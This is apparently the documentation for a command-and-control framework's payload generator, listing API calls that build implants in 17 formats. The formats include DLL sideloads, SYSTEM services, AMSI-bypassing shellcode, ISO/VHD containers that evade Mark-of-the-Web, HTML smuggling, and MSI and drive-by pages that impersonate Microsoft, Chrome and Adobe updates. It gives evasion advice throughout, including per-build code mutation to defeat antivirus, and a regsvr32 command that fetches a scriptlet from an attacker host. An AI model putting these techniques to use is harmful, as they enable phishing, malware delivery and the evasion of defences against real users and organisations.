Payload Formats¶

Stentor generates payloads in 17 output formats covering every major delivery scenario -- from standard Windows executables to MOTW-bypassing containers and browser-based HTML smuggling. Each format is purpose-built for specific operational needs with distinct OPSEC tradeoffs.

Overview¶

The payload generation pipeline transforms Go implant source code into deployable binaries through cross-compilation and optional obfuscation on the Relay agent.

flowchart LR
    A[Operator] -->|POST /api/v1/payloads/generate| B[Backend]
    B -->|WebSocket dispatch| C[Relay]
    C -->|Go cross-compile<br>+ Garble obfuscation<br>+ Donut shellcode| D[Payload Binary]
    D -->|Return binary| B
    B -->|Store + respond| A

Stageless vs Staged Delivery¶

Stentor supports two implant delivery models:

Model	Size	Description	Best For
Stageless	~2MB	Full implant embedded in payload	Reliability, offline targets, air-gapped networks
Staged	~50KB	Small downloader fetches full implant from staging endpoint	Smaller initial footprint, easier implant updates

When to use each

Use stageless when you need guaranteed execution without network dependencies -- the entire implant is self-contained. Use staged when initial payload size matters (e.g., phishing attachments, limited upload channels) and the target has network connectivity to the staging endpoint.

Generating Payloads¶

API Endpoint¶

POST /api/v1/payloads/generate -- Generate a single payload via the connected Relay.

Request Fields¶

Field	Type	Required	Description
`delivery_type`	string	Yes	Payload format: `exe`, `lnk`, `docm`, `xlsm`, `iso`, `hta`, `html_smuggling`, `msi`, `vhd`, `vhdx`, `xll`, `onenote`, `sct`
`implant_variant`	string	No	Implant type: `standalone` (default), `staged`, `dll`, `service`, `shellcode`
`listener_id`	string	No	UUID of listener (preferred over `c2_url`)
`c2_url`	string	No	Direct C2 URL (fallback if no `listener_id`)
`architecture`	string	No	Target architecture: `x64` (default), `x86`
`sleep`	int	No	Beacon callback interval in seconds
`jitter`	int	No	Jitter percentage (0-100)
`filename`	string	No	Output filename (auto-generated if empty)
`obfuscate`	bool	No	Enable Garble obfuscation (unique hash per build)
`profile`	string	No	Malleable C2 profile name
`exit_func`	string	No	`process` (ExitProcess, default) or `thread` (ExitThread)
`kill_date`	string	No	RFC3339 expiration date (e.g., `2026-06-01T00:00:00Z`)
`host_uri`	string	No	Auto-host payload at this URI on the listener

Basic EXE Generation¶

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "exe",
    "implant_variant": "standalone",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "architecture": "x64",
    "filename": "update.exe"
  }'

Batch Generation¶

POST /api/v1/listeners/{id}/generate-all -- Generate all payload variants for a listener as a ZIP archive.

Produces the following variants automatically:

Filename	Variant	Architecture
`beacon.exe`	standalone	x86
`beacon64.exe`	standalone	x64
`beacon.dll`	dll	x86
`beacon64.dll`	dll	x64
`beacon-svc.exe`	service	x86
`beacon-svc64.exe`	service	x64
`beacon.bin`	shellcode	x86
`beacon64.bin`	shellcode	x64
`beacon.ps1`	staged	x64

curl -s -X POST "https://stentor.app/api/v1/listeners/6ea88162-d558-404a-a19f-4b4cab34b22f/generate-all" \
  -H "Authorization: Bearer $TOKEN" \
  -o payloads.zip

Architecture Filter

Pass {"architecture": "x64"} in the request body to generate only 64-bit variants.

Regeneration¶

POST /api/v1/payloads/{id}/regenerate -- Rebuild a payload from its stored configuration. Useful for generating a fresh copy with a new hash while keeping the same settings.

curl -s -X POST "https://stentor.app/api/v1/payloads/abc123/regenerate" \
  -H "Authorization: Bearer $TOKEN"

Download¶

GET /api/v1/payloads/{id}/download -- Download a generated payload binary. This is a public endpoint (no authentication required) so targets can fetch payloads directly.

curl -s "https://stentor.app/api/v1/payloads/abc123/download" -o payload.exe

Auto-Hosting¶

Set host_uri in the generation request to automatically serve the payload at a specific URI path on the listener:

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "exe",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "filename": "update.exe",
    "host_uri": "/updates/kb5034441.exe"
  }'

The response includes a hosted_url field with the full URL where the payload is accessible.

Core Payload Formats¶

These are the fundamental binary output formats that all other delivery mechanisms build upon.

Windows EXE¶

Standard Windows PE executable -- the simplest and most direct payload format.

Property	Value
delivery_type	`exe`
implant_variant	`standalone`
Extension	`.exe`
MITRE	--

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "exe",
    "implant_variant": "standalone",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "architecture": "x64"
  }'

OPSEC Considerations

File written to disk -- subject to AV static and behavioral scanning
Needs Mark-of-the-Web bypass for downloads (use ISO/VHD container or HTML smuggling)
Process creation generates Sysmon Event ID 1
Consider obfuscation ("obfuscate": true) for unique hash per build

Windows DLL¶

Dynamic-link library for DLL sideloading scenarios. Loads within the context of a legitimate application, inheriting its reputation and trust.

Property	Value
delivery_type	`exe`
implant_variant	`dll`
Extension	`.dll`
MITRE	T1574.002 (DLL Side-Loading)

DLL-Specific Options:

Option	Type	Default	Description
`export_name`	string	`DllMain`	Primary export function name

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "exe",
    "implant_variant": "dll",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "architecture": "x64"
  }'

OPSEC Considerations

Better than standalone EXE when sideloaded via a legitimate, signed application
Beacon runs inside the host process -- blends with legitimate activity
Detection: DLL load event (Sysmon Event ID 7), unsigned DLL in application directory
Identify sideloading-vulnerable applications on the target before deployment

Service EXE¶

Implements the Windows Service Control Manager (SCM) interface for service-based persistence. Runs as a Windows service, surviving reboots and running as SYSTEM.

Property	Value
delivery_type	`exe`
implant_variant	`service`
Extension	`.exe`
MITRE	T1543.003 (Create or Modify System Process: Windows Service)

Service-Specific Options:

Option	Type	Default	Description
`service_name`	string	`StentorSvc`	Internal SCM service name
`display_name`	string	`Stentor Update Service`	Human-readable display name
`description`	string	`Provides system update functionality.`	Service description

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "exe",
    "implant_variant": "service",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "architecture": "x64"
  }'

OPSEC Considerations

Appears as a legitimate Windows service in services.msc
Runs as SYSTEM -- no need for privilege escalation after installation
Detection: service creation event (System Event ID 7045), new service binary in filesystem
Use realistic service_name and display_name values that blend with existing services

Raw Shellcode¶

Position-independent code generated via Donut conversion. The most flexible format -- inject into any process without touching disk.

Property	Value
delivery_type	`exe`
implant_variant	`shellcode`
Extension	`.bin` (raw), varies by output format
MITRE	T1620 (Reflective Code Loading)

Shellcode-Specific Options:

Option	Type	Default	Description
`output_format`	string	`raw`	Output format: `raw`, `c`, `csharp`, `python`, `ruby`, `java`, `perl`, `vba`, `hex`
`architecture`	string	`x64`	Target: `x64`, `x86`, `x84` (both)
`compress`	bool	`false`	Enable aPLib compression
`encrypt`	bool	`false`	Enable Donut symmetric encryption
`bypass_amsi`	bool	`false`	Enable AMSI bypass in the Donut loader

Raw BinaryC# Array

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "exe",
    "implant_variant": "shellcode",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "shellcode_config": {
      "output_format": "raw",
      "architecture": "x64"
    }
  }'

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "exe",
    "implant_variant": "shellcode",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "shellcode_config": {
      "output_format": "csharp",
      "architecture": "x64",
      "compress": true,
      "encrypt": true,
      "bypass_amsi": true
    }
  }'

OPSEC Considerations

No file on disk -- most evasive when combined with process injection
Memory-resident only, but subject to memory scanning and ETW telemetry
Use compress and encrypt options to hinder static analysis of the shellcode blob
bypass_amsi adds an AMSI patch to the Donut loader stub

Stager¶

Small downloader (~50KB) that fetches the full implant from a staging endpoint. Two-phase delivery reduces initial payload size.

Property	Value
delivery_type	`exe`
implant_variant	`staged`
Extension	`.exe` or `.ps1`
MITRE	T1105 (Ingress Tool Transfer)

Stager-Specific Options:

Option	Type	Default	Description
`auth_token`	string	(empty)	Bearer token for staging endpoint authentication
`pubkey_path`	string	`/api/v1/c2/pubkey`	RSA public key endpoint path
`keyx_path`	string	`/api/v1/c2/keyx`	Key exchange endpoint path
`stage_path`	string	`/api/v1/c2/stage`	Staging endpoint path

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "exe",
    "implant_variant": "staged",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "architecture": "x64"
  }'

OPSEC Considerations

Smaller initial footprint (~50KB vs ~2MB) -- better for size-constrained channels
Staging traffic generates additional network connections that may be detected
Override default staging paths (pubkey_path, keyx_path, stage_path) for OPSEC
Two-phase execution pattern is a known detection indicator
Use auth_token to prevent unauthorized access to the staging endpoint

Document & Macro Formats¶

Traditional document-based delivery mechanisms. Effective against legacy environments but increasingly blocked by modern Office policies.

Word Macro (DOCM)¶

Macro-enabled Word document containing embedded VBA that executes the payload on document open.

Property	Value
delivery_type	`docm`
Extension	`.docm`
MITRE	T1566.001 (Spearphishing Attachment)

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "docm",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f"
  }'

OPSEC Considerations

Macros are blocked by default in Office 2022+ and Microsoft 365 for internet-sourced documents
Only viable if target organization has macros enabled via Group Policy
Detection: macro execution event, child process spawned by WINWORD.EXE
Consider MOTW bypass (ISO/VHD) to circumvent macro-blocking policies

Excel Macro (XLSM)¶

Macro-enabled Excel spreadsheet with embedded VBA execution. Same capabilities and limitations as DOCM.

Property	Value
delivery_type	`xlsm`
Extension	`.xlsm`
MITRE	T1566.001 (Spearphishing Attachment)

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "xlsm",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f"
  }'

OPSEC Considerations

Same macro-blocking restrictions as DOCM (Office 2022+ blocks by default)
Detection: macro execution event, child process spawned by EXCEL.EXE
Excel-specific: Auto_Open or Workbook_Open macros are well-known detection signatures

HTA¶

HTML Application executed via mshta.exe. Supports three attack methods: direct executable download, PowerShell execution, or VBA shellcode injection.

Property	Value
delivery_type	`hta`
Extension	`.hta`
MITRE	T1218.005 (System Binary Proxy Execution: Mshta)

HTA-Specific Options:

Option	Type	Default	Description
`method`	string	`executable`	Attack method: `executable`, `powershell`, `vba`
`script_type`	string	`vbs`	Scripting language: `vbs`, `js`
`title`	string	`Loading...`	HTA window title
`body_text`	string	`Please wait while document loads...`	Display text
`body_html`	string	(empty)	Custom HTML body (overrides `body_text`)
`width`	int	`400`	Window width in pixels
`height`	int	`200`	Window height in pixels

Executable MethodPowerShell MethodVBA Method

Downloads EXE from C2 and executes it via MSXML2.XMLHTTP:

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "hta",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "hta_config": {
      "method": "executable",
      "title": "Document Viewer",
      "body_text": "Loading secure document..."
    }
  }'

Embeds encoded PowerShell command in HTA VBScript:

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "hta",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "hta_config": {
      "method": "powershell",
      "script_type": "vbs"
    }
  }'

Self-contained shellcode injection -- no EXE download required:

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "hta",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "hta_config": {
      "method": "vba"
    }
  }'

OPSEC Considerations

mshta.exe is a well-known LOLBin -- heavily monitored by EDR
Detection: mshta.exe process creation, child process spawning, script content analysis
The vba method avoids an additional network download but uses PowerShell for shellcode injection
Consider using HTA inside an ISO/VHD container for MOTW bypass

Container Formats (MOTW Bypass)¶

These formats bypass Mark-of-the-Web (MOTW), preventing SmartScreen prompts and zone-based security checks on files extracted from the container.

How MOTW Bypass Works

When a file is downloaded from the internet, Windows attaches a Zone.Identifier alternate data stream (ADS) marking it as "from the internet." Files inside mounted ISO/VHD containers do not inherit this mark, bypassing SmartScreen and other MOTW-based protections (MITRE T1553.005).

ISO¶

ISO 9660 optical disc image container. Windows auto-mounts ISOs on double-click, presenting files in Explorer without MOTW restrictions.

Property	Value
delivery_type	`iso`
Extension	`.iso`
MITRE	T1553.005 (Subvert Trust Controls: Mark-of-the-Web Bypass)

ISO-Specific Options:

Option	Type	Default	Description
`volume_label`	string	`DOCUMENTS`	ISO volume label (max 32 chars)
`include_lnk`	bool	`false`	Include a shortcut that launches the EXE
`lnk_filename`	string	`Report.lnk`	Visible shortcut filename
`exe_filename`	string	`update.exe`	Filename for the hidden EXE
`decoy_filename`	string	(empty)	Optional decoy document name (e.g., `Report.pdf`)
`decoy_data`	bytes	(empty)	Optional decoy document content

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "iso",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "iso_config": {
      "volume_label": "Q4_REPORT",
      "include_lnk": true,
      "lnk_filename": "Q4 Financial Report.lnk",
      "exe_filename": "reader.exe",
      "decoy_filename": "Q4_Report.pdf"
    }
  }'

OPSEC Considerations

Windows auto-mounts ISOs -- no additional software required on target
Files inside lack MOTW -- bypasses SmartScreen prompts
Detection: ISO mount event in Windows logs, executable launched from mounted volume
Use include_lnk with a convincing name to improve social engineering success
Include a decoy document for pretext credibility

VHD / VHDX¶

Virtual hard disk container. Functionally similar to ISO for MOTW bypass but uses the VHD/VHDX format (Windows 8+ native support).

Property	Value
delivery_type	`vhd` or `vhdx`
Extension	`.vhd` or `.vhdx`
MITRE	T1553.005 (Subvert Trust Controls: Mark-of-the-Web Bypass)

VHD-Specific Options:

Option	Type	Default	Description
`format`	string	`vhd`	Container format: `vhd` or `vhdx`
`disk_size_mb`	int	`50`	Virtual disk size in MB
`volume_label`	string	`DOCUMENTS`	FAT filesystem volume label (max 11 chars)
`exe_filename`	string	`update.exe`	Filename for the embedded EXE
`include_lnk`	bool	`false`	Include a shortcut that launches the EXE
`lnk_filename`	string	`Report.lnk`	Visible shortcut filename
`decoy_filename`	string	(empty)	Optional decoy document name

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "vhd",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "vhd_config": {
      "format": "vhd",
      "disk_size_mb": 50,
      "volume_label": "DOCS",
      "include_lnk": true,
      "lnk_filename": "Open Report.lnk",
      "exe_filename": "viewer.exe"
    }
  }'

OPSEC Considerations

Similar MOTW bypass as ISO but less commonly used -- potentially lower defender awareness
VHD format is simpler and more compatible; VHDX is the newer dynamic format
Detection: VHD mount event, disk event logs, executable launched from mounted volume
Larger file size than ISO due to disk image overhead -- adjust disk_size_mb accordingly

Modern Delivery Formats¶

Contemporary delivery mechanisms targeting current security gaps and leveraging trusted system binaries.

HTML Smuggling¶

Embeds a Base64-encoded payload in an HTML file that reconstructs and triggers download via JavaScript blob. Bypasses email gateways and web proxies that inspect file downloads.

Property	Value
delivery_type	`html_smuggling`
Extension	`.html`
MITRE	T1027.006 (Obfuscated Files: HTML Smuggling)

HTML Smuggling Options:

Option	Type	Default	Description
`embedded_payload_type`	string	`exe`	Embedded payload: `exe`, `iso`, `hta`
`title`	string	`Loading Document...`	HTML page title
`body_text`	string	`Please wait while your document is being prepared...`	Display text
`download_filename`	string	`document.exe`	Downloaded file name
`auto_download`	bool	`true`	Trigger download automatically on page load

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "html_smuggling",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "html_smuggling_config": {
      "embedded_payload_type": "iso",
      "title": "Secure Document Portal",
      "body_text": "Your document is being prepared for download...",
      "download_filename": "report.iso",
      "auto_download": true
    }
  }'

Combine with ISO for maximum evasion

Use "embedded_payload_type": "iso" to chain HTML smuggling with MOTW bypass. The HTML page delivers an ISO that contains the payload -- bypassing both email gateway scanning and SmartScreen.

OPSEC Considerations

Bypasses email gateways, web proxies, and network-level file inspection
Payload is reconstructed client-side from Base64 data -- never transmitted as a binary
Detection: large HTML files with embedded JavaScript, JavaScript blob creation events
auto_download triggers download immediately -- disable for a click-to-download flow

MSI¶

Windows Installer package executed via the trusted, signed msiexec.exe system binary.

Property	Value
delivery_type	`msi`
Extension	`.msi`
MITRE	T1218.007 (System Binary Proxy Execution: Msiexec)

MSI-Specific Options:

Option	Type	Default	Description
`product_name`	string	`System Update`	MSI product name
`product_version`	string	`1.0.0`	MSI product version
`manufacturer`	string	`Microsoft Corporation`	MSI manufacturer
`description`	string	(empty)	Product description
`upgrade_code`	string	(auto-generated)	MSI upgrade GUID
`install_scope`	string	`perMachine`	Install scope: `perMachine` or `perUser`

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "msi",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "msi_config": {
      "product_name": "Security Update KB5034441",
      "manufacturer": "Microsoft Corporation",
      "product_version": "10.0.19045",
      "install_scope": "perMachine"
    }
  }'

OPSEC Considerations

msiexec.exe is a trusted, Microsoft-signed binary -- execution via a trusted process
perMachine scope triggers UAC prompt; perUser installs silently
Detection: msiexec.exe child process creation, MSI install event logs (MsiInstaller Event ID 1033/1042)
Use realistic product metadata that matches the pretext scenario

OneNote¶

OneNote package with an embedded HTA payload. Emerged as a popular delivery mechanism after Microsoft blocked macros by default.

Property	Value
delivery_type	`onenote`
Extension	`.onepkg`
MITRE	T1566.001 (Spearphishing Attachment)

OneNote-Specific Options:

Option	Type	Default	Description
`embedded_payload_type`	string	`hta`	Embedded payload: `hta`, `vbs`, `cmd`
`button_text`	string	`Double Click to View Document`	Social engineering overlay text
`title`	string	`Important Document`	OneNote page title
`body_text`	string	`This document contains secure content. Double-click the attachment to view.`	Page body text

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "onenote",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "onenote_config": {
      "embedded_payload_type": "hta",
      "button_text": "Click to View Invoice",
      "title": "Invoice #2024-0847"
    }
  }'

OPSEC Considerations

Originally effective post-macro-disable, but Microsoft has since added restrictions to OneNote embedded files
Detection: OneNote child process creation, embedded file extraction events
User must click the embedded object -- social engineering overlay text is critical

Excel XLL¶

Excel add-in DLL that executes via the xlAutoOpen export when loaded by Excel.

Property	Value
delivery_type	`xll`
Extension	`.xll`
MITRE	T1137.006 (Office Application Startup: Add-ins)

XLL-Specific Options:

Option	Type	Default	Description
`export_name`	string	`xlAutoOpen`	Export function (reserved -- `xlAutoOpen` is always used)

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "xll",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "architecture": "x64"
  }'

OPSEC Considerations

XLL files are loaded by Excel as add-ins, calling xlAutoOpen on load
Microsoft has blocked XLL add-ins from the internet in Microsoft 365 (2023+)
Detection: unsigned DLL loaded by EXCEL.EXE, add-in load event
Most effective via internal delivery (file share, SharePoint) rather than email

COM Scriptlet (SCT)¶

XML scriptlet executed via the signed regsvr32.exe system binary. Supports execution from a remote URL without writing to disk.

Property	Value
delivery_type	`sct`
Extension	`.sct`
MITRE	T1218.010 (System Binary Proxy Execution: Regsvr32)

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "sct",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f"
  }'

Execute on target via:

regsvr32 /s /n /u /i:https://attacker.com/update.sct scrobj.dll

OPSEC Considerations

regsvr32.exe is a trusted, signed Windows binary -- proxy execution bypasses application whitelisting
Can execute directly from URL -- no file on disk required
Detection: regsvr32.exe with /i:URL parameter, scrobj.dll load event
Well-known technique -- most EDR solutions detect regsvr32 scriptlet execution

LNK¶

Windows shortcut file embedding a PowerShell download cradle. Double-click execution with a customizable icon.

Property	Value
delivery_type	`lnk`
Extension	`.lnk`
MITRE	T1204.002 (User Execution: Malicious File)

curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "lnk",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "filename": "Q4 Report.lnk"
  }'

OPSEC Considerations

Double-click execution -- relies on social engineering for user interaction
Contains embedded PowerShell command visible via LNK forensic parsing
Detection: LNK file analysis, PowerShell execution from shortcut, child process creation
Best delivered inside ISO/VHD containers to bypass MOTW

Format Selection Guide¶

Scenario	Recommended Format	Why
Initial access via phishing email	HTML Smuggling + ISO	Bypasses email gateway scanning + MOTW
USB drop / physical access	EXE in ISO or VHD	MOTW bypass, auto-mount on double-click
DLL sideloading (known target app)	DLL	Loads in context of trusted process
Service persistence	Service EXE	Survives reboots, runs as SYSTEM
In-memory only (no file on disk)	Shellcode	Inject into existing process via BOF/injection
Two-stage delivery (small footprint)	Stager	~50KB initial payload, fetches full implant
Trusted installer execution	MSI	Runs via signed `msiexec.exe`
LOLBin execution (regsvr32)	SCT	Signed binary, supports URL execution
Legacy macro delivery	DOCM / XLSM	Only viable if macros are enabled on target
Excel add-in delivery	XLL	Loads via `xlAutoOpen` in Excel process
Post-macro-disable phishing	OneNote	Embedded HTA payload in `.onepkg`
Shortcut-based delivery	LNK inside ISO	Social engineering with MOTW bypass

Chain formats for layered evasion

Combine delivery formats for defense-in-depth bypass. For example: HTML Smuggling (bypasses email gateway) delivers an ISO (bypasses MOTW/SmartScreen) containing an EXE or LNK (actual execution). Each layer defeats a different security control.

Common Options¶

These options apply across all or most payload formats.

Architecture¶

"architecture": "x64"

Target architecture: x64 (default) or x86. Most modern Windows environments are 64-bit -- use x86 only when targeting 32-bit processes or legacy systems.

Obfuscation¶

"obfuscate": true

Enables Garble obfuscation during compilation. Each build produces a unique binary hash, defeating signature-based detection. Increases build time by ~30-60 seconds.

Exit Function¶

"exit_func": "thread"

Controls how the beacon terminates: process (default) calls ExitProcess -- terminates the entire host process. thread calls ExitThread -- terminates only the beacon thread, leaving the host process running. Use thread when injected into a legitimate process you want to keep alive.

Kill Date¶

"kill_date": "2026-06-01T00:00:00Z"

RFC3339 expiration date. After this date, the payload self-terminates on startup and running beacons terminate on their next poll cycle. Use kill dates to limit exposure windows during time-boxed engagements.

Malleable Profile¶

"profile": "jquery"

Malleable C2 profile name for traffic customization. Profiles control HTTP request/response transforms, headers, URIs, and other network indicators. See Malleable Profiles for details.

Sleep & Jitter¶

"sleep": 60,
"jitter": 25

Beacon callback interval in seconds and jitter percentage (0-100). Higher sleep values reduce network noise; jitter adds randomness to callback timing to avoid periodic-pattern detection.

Auto-Hosting¶

"host_uri": "/updates/patch.exe"

Automatically serve the generated payload at the specified URI path on the listener. The response includes the full hosted_url. URI must start with / and cannot use /api/ or /c2/ prefixes.

Code Mutation¶

"code_mutation": true

Enable per-build code mutation to make each generated payload unique at the binary level. The mutation engine applies 4 techniques at compile time:

Technique	Description
Junk code insertion	Adds realistic-looking Win32 API call sequences (12 API pool) that execute but have no functional impact
Opaque predicates	Inserts conditional branches with mathematically predetermined outcomes (7 predicate generators)
Control flow transforms	Restructures basic blocks and loop patterns to change the CFG signature
Constant mutation	Replaces integer/string constants with equivalent computed expressions

Generated mutation code is placed in package beacon with init() + runtime.KeepAlive to prevent dead code elimination. Each build produces a binary with different code patterns, defeating signature-based AV detection.

Code mutation is applied to all 5 direct-compile payload types (EXE, DLL, Service DLL, XLL, Shellcode). Stagers are excluded (they import internal/stager, not internal/beacon).

Artifact Tracking

When code mutation is enabled, the build records a "Code Mutation" artifact for tracking. See MITRE ATT&CK Integration for details on artifact tracking.

OPSEC Guardrails¶

Configure runtime execution guardrails to prevent beacon execution in unauthorized environments.

"guardrails": {
  "kill_date": "2026-03-31",
  "working_hours": "08:00-18:00",
  "working_days": "Mon-Fri",
  "timezone": "America/New_York",
  "geofence_ips": ["10.10.10.0/24"],
  "geofence_hostnames": ["WS01", "WS02", "DC01"],
  "geofence_domains": ["corp.local"],
  "geofence_usernames": ["labuser", "CORP\\jsmith"],
  "dns_canary": "canary.yourdomain.com",
  "edr_check": true
}

Field	Type	Description
`kill_date`	string	Date after which the beacon self-terminates (YYYY-MM-DD format)
`working_hours`	string	Hours during which the beacon is active (HH:MM-HH:MM)
`working_days`	string	Days during which the beacon is active (Mon-Fri, etc.)
`timezone`	string	Windows timezone for working hours (16 common zones mapped)
`geofence_ips`	array	Allowed IP/CIDR ranges -- beacon exits if not in range
`geofence_hostnames`	array	Allowed hostnames -- beacon exits if hostname doesn't match
`geofence_domains`	array	Allowed domains -- beacon exits if not domain-joined to listed domain
`geofence_usernames`	array	Allowed usernames -- beacon exits if running as unlisted user
`dns_canary`	string	DNS canary domain -- beacon resolves this and trips if detected (analyst canary)
`edr_check`	bool	Run EDR detection check on startup (10 vendor signatures)

Geofencing is re-checked every 10 poll cycles (not every cycle) to minimize detection risk. Working hours suppression uses a single long obfuscated sleep instead of rapid check-sleep loops. The CleanupArtifacts function removes scheduled task names, registry patterns, and self-deletes the beacon binary via a batch file on exit.

Transport Selection¶

"transport": "quic"

Select the C2 transport protocol. The transport is auto-detected from the listener type in the UI, but can be explicitly set in the API.

Transport	Value	Description
HTTP	`http`	Unencrypted HTTP (lab only)
HTTPS	`https`	TLS-encrypted HTTP (recommended default)
QUIC	`quic`	HTTP/3 over QUIC/UDP with TLS 1.3
DNS	`dns`	DNS-based C2 (low bandwidth, high stealth)
SMB	`smb`	Named pipe C2 (internal pivoting)

See QUIC Listener for details on the QUIC transport.

Drive-By Delivery¶

Create a social engineering landing page that hosts a payload download disguised as a legitimate software update.

POST /api/v1/payloads/{id}/driveby

Field	Type	Required	Description
`template`	string	Yes	Page template: `chrome`, `windows`, `adobe`
`auto_download`	bool	No	Trigger download automatically on page load

# Generate a payload first
PAYLOAD_ID=$(curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "exe",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f"
  }' | jq -r '.id')

# Create a drive-by page using the Chrome update template
curl -s -X POST "https://stentor.app/api/v1/payloads/$PAYLOAD_ID/driveby" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "template": "chrome",
    "auto_download": true
  }'

Response:

{
  "driveby_url": "http://10.0.0.50/update/chrome/<payload-id>?auto=true",
  "payload_url": "http://10.0.0.50/payload/<payload-id>",
  "template": "chrome",
  "payload_id": "<payload-id>"
}

Available templates:

Template	Impersonates	Best For
`chrome`	Google Chrome update	Broad targeting -- Chrome is the most common browser
`windows`	Windows system update	Enterprise environments with update awareness
`adobe`	Adobe product update	Environments with Adobe software installed

Drive-by workflow

Generate a payload with the desired format
Create a drive-by page with an appropriate template
Send the driveby_url to targets via phishing email, watering hole, or social engineering
Monitor payload downloads via the download_count field on the payload object